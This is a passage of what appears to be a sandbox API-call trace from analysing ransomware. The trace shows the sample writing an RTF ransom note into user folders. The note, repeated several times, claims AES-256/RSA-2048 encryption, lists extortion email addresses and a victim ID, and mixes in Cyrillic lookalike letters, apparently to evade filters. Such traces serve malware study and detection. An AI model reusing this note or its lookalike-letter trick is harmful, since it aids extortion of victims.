d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0068.019] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2867358, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0068.019] WriteFile (in: hFile=0x1cc, lpBuffer=0x2867358*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2867358*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0068.020] CloseHandle (hObject=0x1cc) returned 1 [0068.020] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\l9h2RZXXX5kbGC\\BG85_INFO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vlykov4y_3l2vkihp\\l9h2rzxxx5kbgc\\bg85_info.rtf")) returned 0xffffffff [0068.020] GetLastError () returned 0x2 [0068.020] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\l9h2RZXXX5kbGC\\BG85_INFO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vlykov4y_3l2vkihp\\l9h2rzxxx5kbgc\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0068.021] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 